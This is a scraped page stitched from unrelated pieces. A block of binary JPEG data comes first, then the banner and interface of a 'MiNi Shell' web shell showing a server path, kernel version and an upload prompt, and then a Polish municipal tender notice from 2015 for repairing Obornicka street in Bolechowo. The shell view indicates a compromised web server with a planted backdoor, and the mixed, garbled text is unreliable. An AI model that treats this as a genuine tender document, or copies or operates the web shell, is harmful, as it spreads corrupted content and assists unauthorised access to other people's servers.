JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151223/189347-N-2015.html

<p class="kh_header"><b>Czerwonak: Remont ulicy Obornickiej w miejscowości Bolechowo Osiedle od ulicy Wojska Polskiego do wjazdu do zakładu produkcyjnego firmy SOLARIS - etap I</b><br>
<b>Numer ogłoszenia: 189347 - 2015; data zamieszczenia: 23.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Czerwonak , ul. Źródlana 39, 62-004 Czerwonak, woj. wielkopolskie, tel. 61 6544204, faks 61 8120270.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.czerwonak.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont ulicy Obornickiej w miejscowości Bolechowo Osiedle od ulicy Wojska Polskiego do wjazdu do zakładu produkcyjnego firmy SOLARIS - etap I.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.	Przedmiot zamówienia obejmuje wykonanie, w szczególności następujących robót:
1)	Roboty przygotowawcze i rozbiórkowe:
a)	Mechaniczne ścinanie drzew z karczowaniem pni i wywozem 6,00 szt.
b)	Rozebranie nawierzchni chodników z płytek betonowych lub kostki brukowej 116,00 m2,
c)	Rozebranie podbudowy o grub do 15 cm 116,00m2,
d)	Rozebranie chodników o nawierzchni bitumicznej grubość 3 cm wraz z elementami je ograniczającymi 443,00 m2,
e)		Rozebranie chodników o nawierzchni bitumicznej - dodatek za 1 cm - pogrubienie o 2 cm do grubości 5 cm. 443,00 m2,
f)	Rozebranie podbudowy o grub 15 cm 443,00 m2,
g)	Rozebranie podbudowy - dodatek za 1 cm - pogrubienie o 5 cm do grubości 20 cm. 443,00 m2,
h)	Rozebranie wjazdów o nawierzchni bitumicznej grubość 3 cm wraz z elementami je ograniczającymi 97,00 m2,
i)	Rozebranie wjazdów o nawierzchni bitumicznej - dodatek za 1 cm - pogrubienie o 2 cm do grubości 5 cm.97,00 m2,
j)	Rozebranie podbudowy o grubość 15 cm 97,00 m2,
k)	Rozebranie podbudowy - dodatek za 1 cm - pogrubienie o 7 cm do grubości 22 cm. 97,00 m2,
l)	Rozebranie wjazdów o nawierzchni z płyt betonowych lub betonu o grub 15 cm z wypełnieniem spoin zaprawą 98,00 m2,
m)	Rozebranie podbudowy o grubość 15 cm 98,00 m2,
n)	Rozebranie nawierzchni wjazdów z płytek betonowych lub kostki brukowej 22,00 m2,
o)	Rozebranie podbudowy o grubość do 15 cm 22,00 m2,
p)	Rozebranie podbudowy - dodatek za 1 cm - pogrubienie o 5 cm do grubości 20 cm. Krotność=5 22,00 m2,
q)	Cięcie piłą istniejącej nawierzchni bitumicznej 320,00 metr,
r)	Rozebranie nawierzchni bitumicznej grub 3 cm na szerokość projektowanego ścieku 64,00 m2,
s)	Rozebranie nawierzchni bitumicznej - dodatek za 1 cm - pogrubienie o 7 cm do grubości 10 cm 64,00 m2,
t)	Ręczne rozebranie podbudowy o grub 5 cm - pod ściek 64,00 m2,
u)	Rozebranie krawężnika betonowego 15x30 cm na podsypce cementowo-piaskowej 320,00 metr,
v)	Rozebranie ławy pod krawężniki z betonu 19,20 m3,
w)	Demontaż studzienki ściekowej fi 500 z osadnikiem i syfonem 5,00 kmpl,
x)	Załadunek materiałów z rozbiórki koparko-ładowarką 266,577 m3,
y)	Wywóz materiałów z rozbiórki w miejsce wskazane przez Inwestora lub na wysypisko wraz z kosztami utylizacji 266,58 m3,
z)	Frezowanie istniejącej nawierzchni bitumicznej na całej szerokości na grubość 6 cm wraz z wywozem urobku na wysypisko i ewentualnymi opłatami za składowanie 1 086,00m2,
aa)	Roboty pomiarowe - trasa dróg w terenie równinnym 0,160 km.
2)	Roboty ziemne
a)	Usunięcie warstwy gruntu kat.1-4, wykonanie koryta z ewentualnym odwodnieniem wykopów, wywóz na wysypisko wraz z opłatą za składowanie 74,16 m3,
b)	Usunięcie warstwy gruntu kat.1-4 na powierzchni projektowanych nasypów, przygotowanie pod nasyp dla ścieżki rowerowej i chodnika, wywóz na wysypisko wraz z opłatą za składowanie (50% do wykorzystania pod humusowanie) 26,52 m3,
c)	Formowanie nasypu z zagęszczeniem z gruntu kwalifikowanego wraz z zakupem i dowiezieniem - pod konstrukcję ścieżki rowerowej i chodnika 171,60 m3.
3)	Krawężniki, oporniki, ścieki
a)	Krawężnik betonowy wystający 20x30 cm wraz z wykonaniem ławy betonowej z oporem z betonu C12/15 (0,09m 23/m) 258,00 m,
b)	Krawężnik betonowy wtopiony 20x30 cm wraz z wykonaniem ławy betonowej z oporem z betonu C12/15 (0,09m 3/m) 12,000 m,
c)	Krawężnik betonowy obniżony 20x30 cm wraz z wykonaniem ławy betonowej z oporem z betonu C12/15 (0,09m 3/m) 60,000 m,
d)	Obrzeże betonowe 8x30 cm wraz z wykonaniem ławy betonowej z oporem z betonu C12/15 (0,05m3/m) 398,000 m,
e)	Ściek przykrawężnikowy dwurzędowy szer.20 cm z kostki brukowej betonowej szarej 20x10 cm gr. 8 cm na podłożu betonowym gr.4 cm 320,00 m.
4)	Podbudowy i nawierzchnie		
a)	Profilowanie i zagęszczenie podłoża kat 1-4 wraz z ewentualnym doziarnieniem istniejącego gruntu 1 072,00 m 2,
b)	Podbudowa z gruntu stabilizowanego cementem o Rm=2,5 MPa o grubości warstwy po zagęszczeniu 12 cm 811,00 m 2,
c)	Podbudowa z gruntu stabilizowanego cementem o Rm=5,0 MPa o grubości warstwy po zagęszczeniu 12 cm - zjazdy 261,00 m 2,
d)	Podbudowa z gruntu stabilizowanego cementem o Rm=5,0 MPa - do grubości 15 cm, 261,00 m 2,
e)	Nawierzchnia z kostki brukowej betonowej 20x10 cm grub 8 cm na podsypce cementowo-piaskowej gr.4 cm, kostka w kolorze szarym 499,00 m 2,
f)	Nawierzchnia z kostki brukowej betonowej 20x10 cm grub 8 cm na podsypce cementowo-piaskowej gr.4 cm, kostka w kolorze grafitowym 261,00 m 2,
g)	Nawierzchnia z kostki brukowej betonowej 20x10 cm grub 8 cm na podsypce cementowo-piaskowej gr.4 cm, kostka w kolorze czerwonym bezfazowa 312,00 m 2,
h)	Naprawa spękań odkrytej nawierzchni z zastosowaniem asfaltu wysokomodyfikowanego typu Sikaflex zgodnie z technologią producenta (powierzchnia objęta naprawą 1086 m2) 1,00,
i)	Ułożenie zbrojenia siatką stalową z uwałowaniem walcem gumowym 1 086,00 m 2,
j)	Zamocowanie właściwe siatki do podłoża poprzez ułożenie mieszanki slurry seal grubości około 1 cm z dozowaniem 17-22kg/m2 1 086,00 m 2,
k)	Mechaniczne oczyszczenie nawierzchni bitumicznej 217,20 m 2,
l)	Skropienie nawierzchni bitumicznej emulsją asfaltową szybkorozpadową 50% w ilości 0,50 kg/m2 217,20 m 2,
m)	Ułożenie warstwy wyrównującej z masy mineralno-asfaltowej AC 11W dla uzyskania właściwych pochyleń podłużnych	gwarantujących sprawny spływ wód opadowych i roztopowych z powierzchni jezdni o średniej gr.warstwy 4 cm -przyjęto 20% powierzchni jezdni 217,20 m2,
n)	Ułożenie warstwy wyrównującej z masy mineralno-asfaltowej AC 11W dla uzyskania właściwych pochyleń podłużnych- dodatek za 1 cm - pogrubienie o 1 cm do grubości 5 cm. 86,00 m 2,
o)	Mechaniczne oczyszczenie nawierzchni bitumicznej 1 086,00 m 2,
p)	Skropienie nawierzchni bitumicznej emulsją asfaltową szybkorozpadową 50% w ilości 0,50 kg/m2 2 490,00m 2,
q)	Wykonanie nawierzchni z masy mineralno-asfaltowej AC 11S o gr warstwy 3 cm - warstwa ścieralna 1 086,00 m 2,
r)	Wykonanie nawierzchni z masy mineralno-asfaltowej AC 11S - warstwa ścieralna - dodatek za 1 cm - pogrubienie o 2 cm do grubości 5 cm. 1 086,00m 2.
5)	Odwodnienie
a)	Mechaniczne rozebranie podbudowy betonowej grub 12 cm w miejscu trasy projektowanych przykanalików 7,00 m 2,
b)	Mechaniczne rozebranie podbudowy betonowej - dodatek za 1 cm - pogrubienie o 18 cm do grubości 30 cm.Krotność=18 7,00 m 2,
c)	Załadunek materiałów z rozbiórki koparko-ładowarką 2,31 m 3,
d)	Wywóz materiałów z rozbiórki w miejsce wskazane przez Inwestora lub na wysypisko wraz z kosztami utylizacji 2,31 m 3,
e)	Roboty ziemne w gruncie kat 1-4 z wywozem gruntu wraz z ewentualną opłatą za składowanie 41,22 m 3,
f)	Umocnienie ścian wykopów liniowych obudową boksową wraz z rozbiorką po zakończeniu prac 97,80m 2,
g)	Podłoże pod kanały z piasku grub 15 cm 1,30 m 3,
h)	Studzienka ściekowa uliczna betonowa fi 500 z osadnikiem, pierścieniem odciążającym, pierścieniem utrzymującym wpust i wpustem ulicznym kl.D400 z kołnierzem 6,00 szt,
i)	Kanał z rur kanalizacyjnych PVC fi 200 kl.SN8 o ściance litej łączony na wcisk w wykopie - przykanaliki 7,00 metr,
j)	Włączenie projektowanych przykanalików do istniejącego kanału KD 2,00 szt,
k)	Włączenie projektowanych studzienek ściekowych do istniejących przykanalików 4,00 szt,
l)	Próba szczelności kanałów rurowych do fi 500 (długość 50 m) 0,14 szt,
m)	Zasypanie wykopów piaskiem warstwami 37,35 m 3,
n)	Zagęszczanie zasypki zagęszczarkami 37,35 m 3,
o)	Dostawa piasku do zasypki 37,35m 3,
p)	Podbudowa betonowa grub 12 cm, beton C30/37 - odtworzenie podbudowy 7,00m 2,
q)	Podbudowa betonowa z betonu C30/37 - dodatek za każdy 1 cm - pogrubienie o 18 cm do grubości 30 cm. Krotność= 187,00m 2,
6)	Oświetlenie	
a)	Demontaż oprawy oświetlenia zewnętrznego na słupie lub wysięgniku wraz z wywozem 14,00 kmpl,
b)	Demontaż na słupie wysięgnika rurowego wraz z wywozem 14,00 szt,
c)	Demontaż słupa oświetleniowego wraz z fundamentem i wywozem 14,00 szt,
d)	Rowy dla kabli koparką o głęb do 0,6 m szer do 0,25 m grunt kat 1-2 109,00 m,
e)	Zasypanie rowów koparko-spycharkami głęb do 0,6 m szer do 0,4 m gruntem kat 1-2 109,00 m,
f)	Układanie kabla typu YAKY 4x35 w rowach kablowych 109,00 m,
g)	Mufa kablowa na kablach miedzianych 4-żył o przekroju do 70 mm2 w rowie 28,00 szt,
h)		Układanie uziomu z płaskownika 25x4 mm w rowie kablowym wraz z wykonaniem połączeń 109,00 m,
i)	Nasypanie warstwy piasku na dnie rowu kablowego szer do 0,4 m 109,00 metr,
j)	Obróbka na sucho kabli na napięcie do 1kV o izolacji i powłoce z tworzyw sztucznych, kabel 4-żyłowy do 50 mm2 14,00 szt,
k)	Mechaniczne stawianie słupów oświetleniowych o masie do 300 kg w gruncie kategorii 1-3. Słup o wys.8 m wraz z fundamentem 14,00 szt,
l)	Mocowanie aparatów do 5 kg o 4 otworach z rozebraniem bez podłączenia - podstawa bezpiecznikowa 14,00 szt,
m)		Montaż tabliczek bezpiecznikowych na konstrukcji - tabliczka bezpiecznikowa i wkładka bezpiecznikowa 14,00 szt,
n)	Montaż przewodów wciąganych do latarni wys do 10 m 14,00 kmpl,
o)	Montaż wysięgnika rurowego 1-ramiennego na słupie 13,00 szt,
p)	Montaż wysięgnika rurowego 2-ramiennego na słupie 1,00 szt,
q)	Montaż oprawy oświetleniowej LED typu BOYEN MAXI 8 LED 765 (102W) lub równoważnej wraz z podłączeniem 15,00 szt,
r)	Wykonanie wszelkich wymaganych przepisami badań linii kablowej 1,00,
s)	Przestawienie szafy sterowniczo-licznikowej z układem pomiarowym wraz z fundamentem
i wymianą obudowy na miejsce wskazane przez Inwestora 1,00.
7)	Inne elementy robót
a)	Plantowanie (profilowanie) powierzchni gruntu kat 1-4 pod tereny zielone 337,00 m 2,
b)	Humusowanie z obsianiem przy grubości humusu ok.8 cm (3 cm powyżej powierzchni utwardzonych) 337,00 m 2,
c)	Regulacja wysokościowa włazów studni rewizyjnych do rzędnych nawierzchni jezdni, chodników i zjazdów 8,00 szt,
d)	Przebudowa (wyniesienie studni) studzienki teletechnicznej 2,00 szt.
8)	Oznakowanie pionowe i poziome		
a)	Słupek do znaku drogowego z rur stalowych, ocynkowany fi 70 mm wraz z niezbędnymi mocowaniami, fundament z betonu C8/10 1,00 szt,
b)	Przymocowanie znaku drogowego wg planu oznakowania, tablice z grupy średnie, podkład blacha ocynkowana, odblask folia II generacja 1,00 szt,
c)	Przestawienie, usunięcie istniejących znaków drogowych 10,00 szt,
d)	Malowanie oznakowania poziomego w technice grubowarstwowej chemoutwardzalnej gładkiej, 106,33 m 2.
4.	Na całość wykonanych robót Wykonawca udzieli minimum 36 miesięcy gwarancji i rękojmi, licząc od dnia bezusterkowego protokołu odbioru końcowego.
5.	Szczegółowy opis przedmiotu zamówienia stanowią następujące załączniki do niniejszej SIWZ:
1)	Przedmiar robót,
2)	Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych,
3)	Projekt wykonawczy.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w przepisie 
art. 67 ust. 1 pkt 6 Pzp, do wysokości 50% wartości zamówienia podstawowego w zakresie:
1)	robót przygotowawczych i rozbiórkowych,
2)	robót ziemnych,
3)	odwodnienia,
4)	innych elementy robót,
5)	oznakowania pionowego i poziomego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.10.00.00-8, 45.11.12.00-0, 45.23.13.00-8, 45.23.32.20-7, 45.23.32.90-8, 45.31.61.00-6, 45.23.31.40-2, 45.11.27.10-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wymagania dotyczące wadium 
1.	Wysokość wadium:
Wykonawca zobowiązany jest wnieść wadium w wysokości:
12 000,00 PLN (słownie PLN: dwanaście tysięcy_00/100).
2.	Forma wadium:
Wadium może być wniesione w jednej lub kilku następujących formach:
1)	pieniądzu;
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, gwarancjach z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)	gwarancjach bankowych;
4)	gwarancjach ubezpieczeniowych;
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 
9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007r. Nr 42, poz. 275 z późn. zm.).
3.	Miejsce, sposób i termin wniesienia wadium:
4.	wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego PKO Bank Polski S.A. nr rachunku: 29 1020 4027 0000 1302 1205 0847 na przelewie należy umieścić informację Wadium - Remont ulicy Obornickiej w miejscowości Bolechowo Osiedle od ulicy Wojska Polskiego do wjazdu do zakładu produkcyjnego firmy SOLARIS - etap I
1)	wadium w pozostałych akceptowanych formach należy złożyć w oryginale - przed upływem terminu składania ofert - w siedzibie Zamawiającego: Urząd Gminy Czerwonak, ul. Źródlana 39, pok. 102,
2)	do oferty należy dołączyć kserokopię wnoszonego wadium,
3)	wadium należy wnieść przed upływem terminu składania ofert.
5.	Zwrot wadium:
1)	Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pktu 6 ppkt 2) SIWZ;
2)	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie niniejszego zamówienia oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli było wymagane;
3)	Zamawiający zwróci niezwłocznie wadium Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
6.	Ponowne wniesienie wadium:
Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie pktu 4 ppkt 1), jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
7.	Zatrzymanie wadium:
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli: 
1)	Wykonawca, którego oferta została wybrana:
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych 
w ofercie; 
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy - jeżeli było wymagane;
c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
2)	Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 Pzp, lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunku 
w powyższym zakresie. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt. VII.1.1) SIWZ, Zamawiający dokona oceny spełnienia ww. warunku udziału w postępowaniu na podstawie przedmiotowego oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunku 
w powyższym zakresie. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt. VII.1.1) SIWZ, Zamawiający dokona oceny spełnienia ww. warunku udziału w postępowaniu na podstawie przedmiotowego oświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunku 
w powyższym zakresie. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt. VII.1.1) SIWZ, Zamawiający dokona oceny spełnienia ww. warunku udziału w postępowaniu na podstawie przedmiotowego oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunku 
w powyższym zakresie. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt. VII.1.1) SIWZ, Zamawiający dokona oceny spełnienia ww. warunku udziału w postępowaniu na podstawie przedmiotowego oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunku 
w powyższym zakresie. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt. VII.1.1) SIWZ, Zamawiający dokona oceny spełnienia ww. warunku udziału w postępowaniu na podstawie przedmiotowego oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
